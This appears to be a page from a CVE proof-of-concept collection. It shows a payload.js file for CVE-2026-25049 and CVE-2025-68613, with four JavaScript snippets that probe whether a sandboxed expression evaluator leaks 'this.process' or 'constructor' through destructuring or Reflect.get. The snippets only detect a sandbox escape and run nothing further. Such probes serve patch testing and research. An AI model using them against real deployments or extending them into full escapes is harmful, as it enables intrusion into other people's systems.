4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2026-25049. The file may not exist in the repository.
POC / payload.js JS
module.exports = [
  {
    name: "CVE-2025-68613 / this",
    code: `
      return this.process ? "HAS_PROCESS" : "NO_PROCESS";
    `,
  },

  {
    name: "CVE-2026-25049 / destructuring",
    code: `
      const key = "constructor";
      const { [key]: x } = {};
      return x ? "GOT" : "UNDEFINED";
    `,
  },

  {
    name: "Reflect.get",
    code: `
      return Reflect.get({}, "constructor") ? "GOT" : "UNDEFINED";
    `,
  },

  {
    name: "Dynamic Reflect",
    code: `
      const k = "constructor";
      return Reflect.get({}, k) ? "GOT" : "UNDEFINED";
    `,
  },
];